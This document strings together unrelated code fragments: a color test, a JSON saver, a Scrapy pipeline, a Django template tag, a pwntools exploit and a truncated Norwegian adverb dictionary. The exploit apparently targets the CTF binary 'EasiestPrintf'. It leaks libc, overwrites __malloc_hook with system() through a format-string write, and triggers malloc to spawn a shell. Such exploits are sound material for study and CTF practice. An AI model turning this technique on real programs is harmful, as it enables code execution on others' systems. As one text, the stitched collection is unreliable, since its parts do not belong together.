TODO: what's the point if called without param? test_cases = ['navy', 'aqua', 'teal', 'lime', 'green', 'yellow', 'olive', 'red', 'ghostwhite'] for i, strcol in enumerate(test_cases): print("CSS set:\t\t\t\tColor {} corresponds to: HTML {} / RGB R{} G{} B{} / Access Code {}".format( strcol, col_CSS.get('HEX', strcol), col_CSS.get('RGB', strcol)[0], col_CSS.get('RGB', strcol)[1], col_CSS.get('RGB', strcol)[2], col_CSS.get('MSCode', strcol) )) print("HTML restricted set:\ttColor '{}' is RGB {}".format(strcol, col_HTMr.get('RGB', strcol)))
import intprim.filter.align.dtw
URL = 'https://www.dgi.gov.lk/news/press-releases-sri-lanka/covid-19-documents' GITHUB_URL = 'https://raw.githubusercontent.com/nuuuwan/nopdf_data/main' GITHUB_TOOL_URL = 'https://github.com/nuuuwan/nopdf_data/blob/main'
print((int(input())+11)%24)
# r1 import json import logging from helpers.save.data_saver import DataSaver logger = logging.getLogger('ddd_site_parse') class DataSaverJSON(DataSaver): def __init__(self, params: {}): super().__init__(params) self.ext = 'json' self.newline = params.get('newline', '') def _save(self, data: [], data_fields: [], output_path: str, params: {}) -> None: with open(output_path, 'w', newline=self.newline, encoding=self.encoding) as output: self._check_data_fields(data, data_fields) output.write('[\n') for row in data: try: output.write(f'{json.dumps(dict((key, value) for key, value in row.items() if key in data_fields), indent=1, ensure_ascii=False)},\n') except UnicodeEncodeError as e: logging.debug(f'[E: {e}] Write row error, trying fix encoding: [{row}]') DataSaver.fix_row_encoding(row, self.encoding) output.write(f'{json.dumps(dict((key, value) for key, value in row.items() if key in data_fields), indent=1, ensure_ascii=False)},\n') # remove last \n and comma, cause it occur invalid json output.seek(output.tell() - 2, 0) output.write('\n]')
# -*- coding: utf-8 -*- # Define your item pipelines here # # Don't forget to add your pipeline to the ITEM_PIPELINES setting # See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html import os from scrapy.pipelines.images import ImagesPipeline from urllib import request from trafficsign import settings import re class TrafficsignPipeline(ImagesPipeline): def get_media_requests(self,item,info): # 这个方法是在发送下载请求之前调用 # 其实这个方法本身就是去发送下载请求的 request_objs = super(TrafficsignPipeline,self).get_media_requests(item,info) for request_obj in request_objs: request_obj.item = item return request_objs def file_path(self, request, response=None, info=None): # super 返回的路径 path = super(TrafficsignPipeline,self).file_path(request,response,info) url = request.url category = request.item.get("category") names = request.item.get('names') urls = request.item.get('image_urls') u_index = int(re.search(r'\w{2}(\d+)\.jpg',url).group(1))-1 # 获取文件名称 file_name = names[u_index] # 删除不必要字符 file_name = re.sub(r'[、\.,,!!]+',"",file_name) images_store = settings.IMAGES_STORE category_path = os.path.join(images_store,category) if not os.path.exists(category_path): os.mkdir(category_path) image_name = re.sub(r"full/[\d\w-]+",file_name,path) image_path = os.path.join(category_path,image_name) print(image_path) return image_path
from common.generic_template_tag import GenericTemplateTag from ..utils import get_what_teams_called, make_tournament_link from ..models import PollMap class DisplayTournamentMenuNode(GenericTemplateTag): template = 'display_tournament_menu.html' def __init__(self, tourney, double_br=1, extra_admin=0): self.tourney = tourney self.double_br = double_br self.extra_admin = extra_admin def render(self, context): tourney = self.resolve(context, self.tourney) txt = get_what_teams_called(tourney); link = make_tournament_link(tourney); mapvote = PollMap.objects.filter(tourney=tourney, selected=True) render_context = { 'txt': txt, 'link': link, 'mapvote': mapvote, 'double_br': self.resolve(context, self.double_br), 'extra_admin': self.resolve(context, self.extra_admin), 'tourney': tourney } return self.render_to_string( render_context, context_instance=context ) from django.template import Library register = Library() register.tag('display_tournament_menu', DisplayTournamentMenuNode.invoke)
# File: exp.py # Author: raycp # Date: 2019-06-08 # Description: exp for EasiestPrintf, trigger malloc by printf from pwn_debug import * pdbg=pwn_debug("./EasiestPrintf") pdbg.context.terminal=['tmux', 'splitw', '-h'] #pdbg.local() pdbg.debug("2.27") #pdbg.remote('127.0.0.1', 22) #p=pdbg.run("local") #p=pdbg.run("remote") p=pdbg.run("debug") membp=pdbg.membp #print hex(membp.elf_base),hex(membp.libc_base) elf=pdbg.elf libc=pdbg.libc #io_file=IO_FILE_plus() #io_file.show() def pwn(): pdbg.bp(0x804881C) p.recvuntil("read:\n") p.sendline(str(elf.got['read'])) read_addr=int(p.recvuntil("\n")[:-1],16) libc_base=read_addr-libc.symbols['read'] malloc_hook=libc_base+libc.symbols['__malloc_hook'] system_addr=libc_base+libc.symbols['system'] log.info("leak libc base: %s"%(hex(libc_base))) bss_addr=0x804A520 # write system to malloc_hook and write "/bin/sh\x00" to bss_addr and trigger malloc by big output (code is shown as the bottom), malloc(bss_addr-0x20) to get shell. write_dict={malloc_hook:system_addr,bss_addr:u32('/bin'),bss_addr+4:u32("/sh\x00")} #payload=fmtstr_payload(7,write_dict,write_size="short") payload=pdbg.fmtstr_payload(7,write_dict,"short") payload+="%%%dc"%(bss_addr-0x20) p.recvuntil("Good Bye") log.info("fmt payload len: %s"%(hex(len(payload)))) print repr(payload) p.sendline(payload) p.interactive() if __name__ == '__main__': pwn() ''' //source code to trigger free by printf // in function "printf_positional" which is located in /glibc-2.27/stdio-common/vfprintf.c 1971 /* Maybe the buffer is too small. */ if (MAX (prec, width) + EXTSIZ > WORK_BUFFER_SIZE) { if (__libc_use_alloca ((MAX (prec, width) + EXTSIZ) * sizeof (CHAR_T))) workend = ((CHAR_T *) alloca ((MAX (prec, width) + EXTSIZ) * sizeof (CHAR_T)) + (MAX (prec, width) + EXTSIZ)); else { workstart = (CHAR_T *) malloc ((MAX (prec, width) + EXTSIZ) * sizeof (CHAR_T)); if (workstart == NULL) { done = -1; goto all_done; } workend = workstart + (MAX (prec, width) + EXTSIZ); } } '''
# coding: utf8 """ All wordforms are extracted from Norsk Ordbank in Norwegian Bokmål 2005, updated 20180627 (CLARINO NB - Språkbanken), Nasjonalbiblioteket, Norway: https://www.nb.no/sprakbanken/show?serial=oai%3Anb.no%3Asbr-5&lang=en License: Creative_Commons-BY (CC-BY) (https://creativecommons.org/licenses/by/4.0/) """ from __future__ import unicode_literals ADVERBS_WORDFORMS = { 'à jour': ('à jour',), 'à la carte': ('à la carte',), 'à la grecque': ('à la grecque',), 'à la mode': ('à la mode',), 'òg': ('òg',), 'a cappella': ('a cappella',), 'a konto': ('a konto',), 'a posteriori': ('a posteriori',), 'a prima vista': ('a prima vista',), 'a priori': ('a priori',), 'a tempo': ('a tempo',), 'a verbo': ('a verbo',), 'a viso': ('a viso',), 'a vista': ('a vista',), 'ad absurdum': ('ad absurdum',), 'ad acta': ('ad acta',), 'ad hoc': ('ad hoc',), 'ad infinitum': ('ad infinitum',), 'ad notam': ('ad notam',), 'ad undas': ('ad undas',), 'adagio': ('adagio',), 'akkurat': ('akkurat',), 'aktenfor': ('aktenfor',), 'aktenfra': ('aktenfra',), 'akter': ('akter',), 'akterinn': ('akterinn',), 'akterover': ('akterover',), 'akterut': ('akterut',), 'al fresco': ('al fresco',), 'al secco': ('al secco',), 'aldeles': ('aldeles',), 'alders tid': ('alders tid',), 'aldri': ('aldri',), 'aleine': ('aleine',), 'alene': ('alene',), 'alias': ('alias',), 'allegretto': ('allegretto',), 'allegro': ('allegro',), 'aller': ('aller',), 'allerede': ('allerede',), 'allesteds': ('allesteds',), 'allestedsfra': ('allestedsfra',), 'allestedshen': ('allestedshen',), 'allikevel': ('allikevel',), 'alltid': ('alltid',), 'alltids': ('alltids',), 'alt': ('alt',), 'altfor': ('altfor',), 'altså': ('altså',), 'amok': ('amok',), 'an': ('an',), 'ana': ('ana',), 'andante': ('andante',), 'andantino': ('andantino',), 'andelsvis': ('andelsvis',), 'andfares': ('andfares',), 'andføttes': ('andføttes',), 'annensteds': ('annensteds',), 'annenstedsfra': ('annenstedsfra',), 'annenstedshen': ('annenstedshen',), 'annetsteds': ('annetsteds',), 'annetstedsfra': ('annetstedsfra',), 'annetstedsfra': ('annetstedsfra',), 'annetstedshen': ('annetstedshen',), 'anno': ('anno',), 'anslagsvis': ('anslagsvis',), 'anstendigvis': ('anstendigvis',), 'anstigende': ('anstigende',), 'antakeligvis': ('antakeligvis',), 'antydningsvis': ('antydningsvis',), 'apropos': ('apropos',), 'argende': ('argende',), 'at': ('at',), 'att': ('att',), 'attende': ('attende',), 'atter': ('atter',), 'attpåtil': ('attpåtil',), 'attåt': ('attåt',), 'au': ('au',), 'aust': ('aust',), 'austa': ('austa',), 'austafjells': ('austafjells',), 'av gårde': ('av gårde',), 'av sted': ('av sted',), 'avdelingsvis': ('avdelingsvis',), 'avdragsvis': ('avdragsvis',), 'avhendes': ('avhendes',), 'avhends': ('avhends',), 'avsatsvis': ('avsatsvis',), 'babord': ('babord',), 'bakfra': ('bakfra',), 'bakk': ('bakk',), 'baklengs': ('baklengs',), 'bakover': ('bakover',), 'bakut': ('bakut',), 'bare': ('bare',), 'bataljonsvis': ('bataljonsvis',), 'beint fram': ('beint fram',), 'bekende': ('bekende',), 'belgende': ('belgende',), 'bent fram': ('bent fram',), 'bent frem': ('bent frem',), 'betids': ('betids',), 'bi': ('bi',), 'bidevind': ('bidevind',), 'bis': ('bis',), 'bitevis': ('bitevis',), 'bitte': ('bitte',), 'bitterlig': ('bitterlig',), 'blanko': ('blanko',), 'blidelig': ('blidelig',), 'blikk': ('blikk',), 'blikkende': ('blikkende',), 'blottende': ('blottende',), 'bom': ('bom',), 'bommende': ('bommende',), 'bona fide': ('bona fide',), 'bort': ('bort',), 'borte': ('borte',), 'bortimot': ('bortimot',), 'brennfort': ('brennfort',), 'bråtevis': ('bråtevis',), 'bums': ('bums',), 'buntevis': ('buntevis',), 'buntvis': ('buntvis',), 'bus': ('bus',), 'bygdimellom': ('bygdimellom',), 'cantabile': ('cantabile',), 'cf': ('cf',), 'cif': ('cif',), 'cirka': ('cirka',), 'comme il faut': ('comme il faut',), 'crescendo': ('crescendo',), 'da': ('da',), 'dagevis': ('dagevis',), 'dagstøtt': ('dagstøtt',), 'dakapo': ('dakapo',), 'dam': ('dam',), 'dammende': ('dammende',), 'dann': ('dann',), 'de facto': ('de facto',), 'de jure': ('de jure',), 'decrescendo': ('decrescendo',), 'delkredere': ('delkredere',), 'dels': ('dels',), 'delvis': ('delvis',), 'den gang': ('den gang',), 'der': ('der',), 'der borte': ('der borte',), 'der hen': ('der hen',), 'der inne': ('der inne',), 'der nede': ('der nede',), 'der oppe': ('der oppe',), 'der ute': ('der ute',), 'derav': ('derav',), 'deretter': ('deretter',), 'derfor': ('derfor',), 'derfra': ('derfra',), 'deri': ('deri',), 'deriblant': ('deriblant',), 'derifra': ('derifra',), 'derimot': ('derimot',), 'dermed': ('dermed',), 'dernest': ('dernest',), 'derom': ('derom',), 'derpå': ('derpå',), 'dertil': ('dertil',), 'derved': ('derved',), 'dess': ('dess',), 'dessuten': ('dessuten',), 'dessverre': ('dessverre',), 'desto': ('desto',), 'diminuendo': ('diminuendo',), 'dis': ('dis',), 'dit': ('dit',), 'dit hen': ('dit hen',), 'ditover': ('ditover',), 'ditto': ('ditto',), 'dog': ('dog',), 'dolce': ('dolce',), 'dorgende': ('dorgende',), 'dryppende': ('dryppende',), 'drøssevis': ('drøssevis',), 'dus': ('dus',), 'dusinvis': ('dusinvis',), 'dyende': ('dyende',), 'døgnvis': ('døgnvis',), 'dønn': ('dønn',), 'dørg': ('dørg',), 'dørgende': ('dørgende',), 'dørimellom': ('dørimellom',), 'ei': ('ei',), 'eiende': ('eiende',), 'einkom': ('einkom',), 'eitrende': ('eitrende',), 'eks': ('eks',), 'eksempelvis': ('eksempelvis',), 'eksklusiv': ('eksklusiv',), 'eksklusive': ('eksklusive',), 'ekspress': ('ekspress',), 'ekstempore': ('ekstempore',), 'ellers': ('ellers',), 'en': ('en',), 'en bloc': ('en bloc',), 'en detail': ('en detail',), 'en face': ('en face',), 'en gros': ('en gros',), 'en masse': ('en masse',), 'en passant': ('en passant',), 'en profil': ('en profil',), 'en suite': ('en suite',), 'enda': ('enda',), 'endatil': ('endatil',), 'ende': ('ende',), 'ende fram': ('ende fram',), 'ende frem': ('ende frem',), 'ender': ('ender',), 'endog': ('endog',), 'ene': ('ene',), 'engang': ('engang',), 'enkeltvis': ('enkeltvis',), 'enkom': ('enkom',), 'enn': ('enn',), 'ennå': ('ennå',), 'ensteds': ('ensteds',), 'eo ipso': ('eo ipso',), 'ergo': ('ergo',), 'et cetera': ('et cetera',), 'etappevis': ('etappevis',), 'etsteds': ('etsteds',), 'etterhånden': ('etterhånden',), 'etterpå': ('etterpå',), 'etterskottsvis': ('etterskottsvis',), 'etterskuddsvis': ('etterskuddsvis',), 'ex animo': ('ex animo',), 'ex auditorio': ('ex auditorio',), 'ex cathedra': ('ex cathedra',), 'ex officio': ('ex officio',), 'exit': ('exit',), 'f.o.r.': ('f.o.r.',), 'fas': ('fas',), 'fatt': ('fatt',), 'feil': ('feil',), 'femti-femti': ('femti-femti',), 'fifty-fifty': ('fifty-fifty',), 'flekkevis': ('flekkevis',), 'flokkevis': ('flokkevis',), 'fluks': ('fluks',), 'fluksens': ('fluksens',), 'flunkende': ('flunkende',), 'flust': ('flust',), 'fly': ('fly',), 'fløyten': ('fløyten',), 'fob': ('fob',), 'for': ('for',), 'for hånden': ('for hånden',), 'for lengst': ('for lengst',), 'for resten': ('for resten',), 'for så vidt': ('for så vidt',), 'for tida': ('for tida',), 'for tiden': ('for tiden',), 'for visst': ('for visst',), 'for øvrig': ('for øvrig',), 'fordevind': ('fordevind',), 'fordum': ('fordum',), 'fore': ('fore',), 'forfra': ('forfra',), 'forhakkende': ('forhakkende',), 'forholdsvis': ('forholdsvis',), 'forhåpentlig': ('forhåpentlig',), 'forhåpentligvis': ('forhåpentligvis',), 'forlengs': ('forlengs',), 'formelig': ('formelig',), 'forover': ('forover',), 'forresten': ('forresten',), 'forsøksvis': ('forsøksvis',), 'fort': ('fort',), 'fortere': ('fort',), 'fortest': ('fort',), 'forte': ('forte',), 'fortfarende': ('fortfarende',), 'fortissimo': ('fortissimo',), 'fortrinnsvis': ('fortrinnsvis',), 'forut': ('forut',), 'fra borde': ('fra borde',), 'fram': ('fram',), 'framføre': ('framføre',), 'framleis': ('framleis',), 'framlengs': ('framlengs',), 'framme': ('framme',), 'framstupes': ('framstupes',), 'framstups': ('framstups',), 'franko': ('franko',), 'free on board': ('free on board',), 'free on rail': ('free on rail',), 'frem': ('frem',), 'fremad': ('fremad',), 'fremdeles': ('fremdeles',), 'fremlengs': ('fremlengs',), 'fremme': ('fremme',), 'fremstupes': ('fremstupes',), 'fremstups': ('fremstups',), 'furioso': ('furioso',), 'fylkesvis': ('fylkesvis',), 'følgelig': ('følgelig',), 'føre': ('føre',), 'først': ('først',), 'ganske': ('ganske',), 'gardimellom': ('gardimellom',), 'gatelangs': ('gatelangs',), 'gid': ('gid',), 'givetvis': ('givetvis',), 'gjerne': ('gjerne',), 'gladelig': ('gladelig',), 'glimtvis': ('glimtvis',), 'glissando': ('glissando',), 'glugg': ('glugg',), 'gorr': ('gorr',), 'gorrende': ('gorrende',), 'gradvis': ('gradvis',), 'grandioso': ('grandioso',), 'granngivelig': ('granngivelig',), 'grassat': ('grassat',), 'grave': ('grave',), 'gruppevis': ('gruppevis',), 'gudskjelov': ('gudskjelov',), 'gullende': ('gullende',), 'gørr': ('gørr',), 'gørrende': ('gørrende',), 'hakk': ('hakk',), 'hakkende': ('hakkende',), 'halvveges': ('halvveges',), 'halvvegs': ('halvvegs',), 'halvveis': ('halvveis',), 'haugevis': ('haugevis',), 'heden': ('heden',), 'heim': ('heim',), 'heim att': ('heim att',), 'heiman': ('heiman',), 'heime': ('heime',), 'heimefra': ('heimefra',), 'heimetter': ('heimetter',), 'heimom': ('heimom',), 'heimover': ('heimover',), 'heldigvis': ('heldigvis',), 'heller': ('heller',), 'helst': ('helst',), 'hen': ('hen',), 'henholdsvis': ('henholdsvis',), 'henne': ('henne',), 'her': ('her',), 'herav': ('herav',), 'heretter': ('heretter',), 'herfra': ('herfra',), 'heri': ('heri',), 'heriblant': ('heriblant',), 'herifra': ('herifra',), 'herigjennom': ('herigjennom',), 'herimot': ('herimot',), 'hermed': ('hermed',), 'herom': ('herom',), 'herover': ('herover',), 'herpå': ('herpå',), 'herre': ('herre',), 'hersens': ('hersens',), 'hertil': ('hertil',), 'herunder': ('herunder',), 'herved': ('herved',), 'himlende': ('himlende',), 'hisset': ('hisset',), 'hist': ('hist',), 'hit': ('hit',), 'hitover': ('hitover',), 'hittil': ('hittil',), 'hjem': ('hjem',), 'hjemad': ('hjemad',), 'hjemetter': ('hjemetter',), 'hjemme': ('hjemme',), 'hjemmefra': ('hjemmefra',), 'hjemom': ('hjemom',), 'hjemover': ('hjemover',), 'hodekulls': ('hodekulls',), 'hodestupes': ('hodestupes',), 'hodestups': ('hodestups',), 'hoggende': ('hoggende',), 'honoris causa': ('honoris causa',), 'hoppende': ('hoppende',), 'hulter': ('hulter',), 'hundretusenvis': ('hundretusenvis',), 'hundrevis': ('hundrevis',), 'hurra-meg-rundt': ('hurra-meg-rundt',), 'husimellom': ('husimellom',), 'hvi': ('hvi',), 'hvor': ('hvor',), 'hvor hen': ('hvor hen',), 'hvorav': ('hvorav',), 'hvordan': ('hvordan',), 'hvoretter': ('hvoretter',), 'hvorfor': ('hvorfor',), 'hvorfra': ('hvorfra',), 'hvori': ('hvori',), 'hvoriblant': ('hvoriblant',), 'hvorimot': ('hvorimot',), 'hvorledes': ('hvorledes',), 'hvormed': ('hvormed',), 'hvorom': ('hvorom',), 'hvorpå': ('hvorpå',), 'hånt': ('hånt',), 'høylig': ('høylig',), 'høyst': ('høyst',), 'i aften': ('i aften',), 'i aftes': ('i aftes',), 'i alle fall': ('i alle fall',), 'i dag': ('i dag',), 'i fjor': ('i fjor',), 'i fleng': ('i fleng',), 'i forfjor': ('i forfjor',), 'i forgårs': ('i forgårs',), 'i gjerde': ('i gjerde',), 'i gjære': ('i gjære',), 'i grunnen': ('i grunnen',), 'i går': ('i går',), 'i hende': ('i hende',), 'i hjel': ('i hjel',), 'i hug': ('i hug',), 'i huleste': ('i huleste',), 'i stedet': ('i stedet',), 'iallfall': ('iallfall',), 'ibidem': ('ibidem',), 'id est': ('id est',), 'igjen': ('igjen',), 'ikke': ('ikke',), 'ildende': ('ildende',), 'ille': ('ille',), 'imens': ('imens',), 'imidlertid': ('imidlertid',), 'in absentia': ('in absentia',), 'in absurdum': ('in absurdum',), 'in blanko': ('in blanko',), 'in casu': ('in casu',), 'in contumaciam': ('in contumaciam',), 'in corpore': ('in corpore',), 'in duplo': ('in duplo',), 'in extenso': ('in extenso',), 'in flagranti': ('in flagranti',), 'in honorem': ('in honorem',), 'in medias res': ('in medias res',), 'in memoriam': ('in memoriam',), 'in mente': ('in mente',), 'in natura': ('in natura',), 'in nuce': ('in nuce',), 'in persona': ('in persona',), 'in quarto': ('in quarto',), 'in saldo': ('in saldo',), 'in salvo': ('in salvo',), 'in situ': ('in situ',), 'in solidum': ('in solidum',), 'in spe': ('in spe',), 'in triplo': ('in triplo',), 'in vitro': ('in vitro',), 'in vivo': ('in vivo',), 'ingenlunde': ('ingenlunde',), 'ingensteds': ('ingensteds',), 'inklusiv': ('inklusiv',), 'inklusive': ('inklusive',), 'inkognito': ('inkognito',), 'inn': ('inn',), 'innad': ('innad',), 'innafra': ('innafra',), 'innalands': ('innalands',), 'innaskjærs': ('innaskjærs',), 'inne': ('inne',), 'innenat': ('innenat',), 'innenfra': ('innenfra',), 'innenlands': ('innenlands',), 'innenskjærs': ('innenskjærs',), 'innledningsvis': ('innledningsvis',), 'innleiingsvis': ('innleiingsvis',), 'innomhus': ('innomhus',), 'isteden': ('isteden',), 'især': ('især',), 'item': ('item',), 'ja menn': ('ja menn',), 'ja så menn': ('ja så menn',), 'jammen': ('jammen',), 'jamnlig': ('jamnlig',), 'jamsides': ('jamsides',), 'jamt over': ('jamt over',), 'jamvel': ('jamvel',), 'jaså': ('jaså',), 'jevnlig': ('jevnlig',), 'jevnsides': ('jevnsides',), 'jevnt over': ('jevnt over',), 'jo menn': ('jo menn',), 'jommen': ('jommen',), 'just': ('just',), 'kanon': ('kanon',), 'kanskje': ('kanskje',), 'kav': ('kav',), 'kavende': ('kavende',), 'kilovis': ('kilovis',), 'klin': ('klin',), 'klink': ('klink',), 'klinkende': ('klinkende',), 'klokelig': ('klokelig',), 'knakende': ('knakende',), 'knapt': ('knapt',), 'knasende': ('knasende',), 'knekkende': ('knekkende',), 'knøtrende': ('knøtrende',), 'knøttende': ('knøttende',), 'kolende': ('kolende',), 'kul': ('kul',), 'kuli': ('kuli',), 'kun': ('kun',), 'kvartalsvis': ('kvartalsvis',), 'kvekk': ('kvekk',), 'kølende': ('kølende',), 'lagerfritt': ('lagerfritt',), 'lagom': ('lagom',), 'lagvis': ('lagvis',), 'landimellom': ('landimellom',), 'landverts': ('landverts',), 'langt': ('langt',), 'lenger': ('langt',), 'lengst': ('langt',), 'langveges': ('langveges',), 'langvegesfra': ('langvegesfra',), 'langvegs': ('langvegs',), 'langvegsfra': ('langvegsfra',), 'langveis': ('langveis',), 'langveisfra': ('langveisfra',), 'larghetto': ('larghetto',), 'largo': ('largo',), 'lassevis': ('lassevis',), 'legato': ('legato',), 'leilighetsvis': ('leilighetsvis',), 'lell': ('lell',), 'lenge': ('lenge',), 'lenger': ('lenge',), 'lengst': ('lenge',), 'lenger': ('lenger',), 'liddelig': ('liddelig',), 'like': ('like',), 'likeledes': ('likeledes',), 'likeså': ('likeså',), 'likevel': ('likevel',), 'likså': ('likså',), 'lissom': ('lissom',), 'litervis': ('litervis',), 'livende': ('livende',), 'lovformelig': ('lovformelig',), 'lovlig': ('lovlig',), 'lukt': ('lukt',), 'lut': ('lut',), 'luta': ('luta',), 'lutende': ('lutende',), 'lykkeligvis': ('lykkeligvis',), 'lynfort': ('lynfort',), 'lys': ('lys',), 'maestoso': ('maestoso',), 'mala fide': ('mala fide',), 'malapropos': ('malapropos',), 'mannemellom': ('mannemellom',), 'massevis': ('massevis',), 'med rette': ('med rette',), 'medio': ('medio',), 'medium': ('medium',), 'medsols': ('medsols',), 'medstrøms': ('medstrøms',), 'meget': ('meget',), 'mengdevis': ('mengdevis',), 'metervis': ('metervis',), 'mezzoforte': ('mezzoforte',), 'midsommers': ('midsommers',), 'midt': ('midt',), 'midtfjords': ('midtfjords',), 'midtskips': ('midtskips',), 'midtsommers': ('midtsommers',), 'midtveges': ('midtveges',), 'midtvegs': ('midtvegs',), 'midtveis': ('midtveis',), 'midtvinters': ('midtvinters',), 'midvinters': ('midvinters',), 'milevis': ('milevis',), 'millionvis': ('millionvis',), 'min sann': ('min sann',), 'min sant': ('min sant',), 'min santen': ('min santen',), 'minus': ('minus',), 'mo': ('mo',), 'molto': ('molto',), 'motsols': ('motsols',), 'motstrøms': ('motstrøms',), 'mukk': ('mukk',), 'mukkende': ('mukkende',), 'muligens': ('muligens',), 'muligvis': ('muligvis',), 'murende': ('murende',), 'musende': ('musende',), 'mutters': ('mutters',), 'månedsvis': ('månedsvis',), 'naggende': ('naggende',), 'naturligvis': ('naturligvis',), 'nauende': ('nauende',), 'navnlig': ('navnlig',), 'ned': ('ned',), 'nedad': ('nedad',), 'nedatil': ('nedatil',), 'nede': ('nede',), 'nedentil': ('nedentil',), 'nedenunder': ('nedenunder',), 'nedstrøms': ('nedstrøms',), 'neigu': ('neigu',), 'neimen': ('neimen',), 'nemlig': ('nemlig',), 'neppe': ('neppe',), 'nesegrus': ('nesegrus',), 'nest': ('nest',), 'nesten': ('nesten',), 'nettopp': ('nettopp',), 'noenlunde': ('noenlunde',), 'noensinne': ('noensinne',), 'noensteds': ('noensteds',), 'nok': ('nok',), 'noksom': ('noksom',), 'nokså': ('nokså',), 'non stop': ('non stop',), 'nonstop': ('nonstop',), 'nord': ('nord',), 'nordafjells': ('nordafjells',), 'nordaust': ('nordaust',), 'nordenfjells': ('nordenfjells',), 'nordost': ('nordost',), 'nordvest': ('nordvest',), 'nordøst': ('nordøst',), 'notabene': ('notabene',), 'nyss': ('nyss',), 'nå': ('nå',), 'når': ('når',), 'nåvel': ('nåvel',), 'nær': ('nær',), 'nærere': ('nær',), 'nærmere': ('nær',), 'nærest': ('nær',), 'nærmest': ('nær',), 'nære': ('nære',), 'nærere': ('nærere',), 'nærest': ('nærest',), 'nærme': ('nærme',), 'nærmere': ('nærmere',), 'nærmest': ('nærmest',), 'nødig': ('nødig',), 'nødigere': ('nødig',), 'nødigst': ('nødig',), 'nødvendigvis': ('nødvendigvis',), 'offside': ('offside',), 'ofte': ('ofte',), 'oftere': ('ofte',), 'oftest': ('ofte',), 'også': ('også',), 'om att': ('om att',), 'om igjen': ('om igjen',), 'omme': ('omme',), 'omsider': ('omsider',), 'omsonst': ('omsonst',), 'omtrent': ('omtrent',), 'onnimellom': ('onnimellom',), 'opp': ('opp',), 'opp att': ('opp att',), 'opp ned': ('opp ned',), 'oppad': ('oppad',), 'oppe': ('oppe',), 'oppstrøms': ('oppstrøms',), 'ost': ('ost',), 'ovabords': ('ovabords',), 'ovatil': ('ovatil',), 'oven': ('oven',), 'ovenbords': ('ovenbords',), 'oventil': ('oventil',), 'overalt': ('overalt',), 'overens': ('overens',), 'overhodet': ('overhodet',), 'overlag': ('overlag',), 'overmorgen': ('overmorgen',), 'overmåte': ('overmåte',), 'overvettes': ('overvettes',), 'pakkende': ('pakkende',), 'pal': ('pal',), 'par avion': ('par avion',), 'par excellence': ('par excellence',), 'parlando': ('parlando',), 'pars pro toto': ('pars pro toto',), 'partout': ('partout',), 'parvis': ('parvis',), 'per capita': ('per capita',), 'pianissimo': ('pianissimo',), 'piano': ('piano',), 'pinende': ('pinende',), 'pinnende': ('pinnende',), 'pist': ('pist',), 'pizzicato': ('pizzicato',), 'pladask': ('pladask',), 'plent': ('plent',), 'plenty': ('plenty',), 'pluss': ('pluss',), 'porsjonsvis': ('porsjonsvis',), 'portamento': ('portamento',), 'portato': ('portato',), 'post festum': ('post festum',), 'post meridiem': ('post meridiem',), 'post mortem': ('post mortem',), 'prestissimo': ('prestissimo',), 'presto': ('presto',), 'prima vista': ('prima vista',), 'primo': ('primo',), 'pro anno': ('pro anno',), 'pro persona': ('pro persona',), 'pro tempore': ('pro tempore',), 'proforma': ('proforma',), 'prompt': ('prompt',), 'prompte': ('prompte',), 'proppende': ('proppende',), 'prosentvis': ('prosentvis',), 'pukka': ('pukka',), 'puljevis': ('puljevis',), 'punktvis': ('punktvis',), 'pyton': ('pyton',), 'pø om pø': ('pø om pø',), 'quantum satis': ('quantum satis',), 'rammende': ('rammende',), 'rangsøles': ('rangsøles',), 'rasende': ('rasende',), 'ratevis': ('ratevis',), 'ratt': ('ratt',), 'rav': ('rav',), 'ravende': ('ravende',), 'reint': ('reint',), 'rent': ('rent',), 'respektive': ('respektive',), 'rettsøles': ('rettsøles',), 'reverenter': ('reverenter',), 'riktignok': ('riktignok',), 'rimeligvis': ('rimeligvis',), 'ringside': ('ringside',), 'rispende': ('rispende',), 'ritardando': ('ritardando',), 'riv': ('riv',), 'rubato': ('rubato',), 'ruskende': ('ruskende',), 'rykkevis': ('rykkevis',), 'saktelig': ('saktelig',), 'saktens': ('saktens',), 'sammen': ('sammen',), 'sammesteds': ('sammesteds',), 'sammestedsfra': ('sammestedsfra',), 'samstundes': ('samstundes',), 'samt': ('samt',), 'sann': ('sann',), 'sannelig': ('sannelig',), 'sannsynligvis': ('sannsynligvis',), 'sans phrase': ('sans phrase',), 'scilicet': ('scilicet',), 'seinhøstes': ('seinhøstes',), 'senhøstes': ('senhøstes',), 'sia': ('sia',), 'sic': ('sic',), 'sidelangs': ('sidelangs',), 'sidelengs': ('sidelengs',), 'siden': ('siden',), 'sideveges': ('sideveges',), 'sidevegs': ('sidevegs',), 'sideveis': ('sideveis',), 'sikkerlig': ('sikkerlig',), 'silde': ('silde',), 'simpelthen': ('simpelthen',), 'sine anno': ('sine anno',), 'sistpå': ('sistpå',), 'sjelden': ('sjelden',), 'sjøleies': ('sjøleies',), 'sjøverts': ('sjøverts',), 'skeis': ('skeis',), 'skiftevis': ('skiftevis',), 'skita': ('skita',), 'skjøns': ('skjøns',), 'skogleies': ('skogleies',), 'skokkevis': ('skokkevis',), 'skrevs': ('skrevs',), 'skrittvis': ('skrittvis',), 'skrås': ('skrås',), 'skyllende': ('skyllende',), 'skåldende': ('skåldende',), 'slettes': ('slettes',), 'sluttelig': ('sluttelig',), 'smekk': ('smekk',), 'smellende': ('smellende',), 'småningom': ('småningom',), 'snart': ('snart',), 'snarere': ('snart',), 'snarest': ('snart',), 'sneisevis': ('sneisevis',), 'snesevis': ('snesevis',), 'snuft': ('snuft',), 'snupt': ('snupt',), 'snyt': ('snyt',), 'snyta': ('snyta',), 'snyte': ('snyte',), 'solo': ('solo',), 'sommerstid': ('sommerstid',), 'sommesteds': ('sommesteds',), 'spenna': ('spenna',), 'spent': ('spent',), 'spika': ('spika',), 'spikende': ('spikende',), 'spildrende': ('spildrende',), 'spill': ('spill',), 'splinter': ('splinter',), 'splitter': ('splitter',), 'sporenstreks': ('sporenstreks',), 'sprangvis': ('sprangvis',), 'sprell': ('sprell',), 'sprut': ('sprut',), 'sprutende': ('sprutende',), 'sprøyte': ('sprøyte',), 'stakkato': ('stakkato',), 'stapp': ('stapp',), 'stappa': ('stappa',), 'stappende': ('stappende',), 'staurende': ('staurende',), 'stedvis': ('stedvis',), 'steika': ('steika',), 'stein': ('stein',), 'steinsens': ('steinsens',), 'stokk': ('stokk',), 'stokkende': ('stokkende',), 'straks': ('straks',), 'stringendo': ('stringendo',), 'stummende': ('stummende',), 'stundimellom': ('stundimellom',), 'stundom': ('stundom',), 'stundomtil': ('stundomtil',), 'stupende': ('stupende',), 'styggelig': ('styggelig',), 'styggende': ('styggende',), 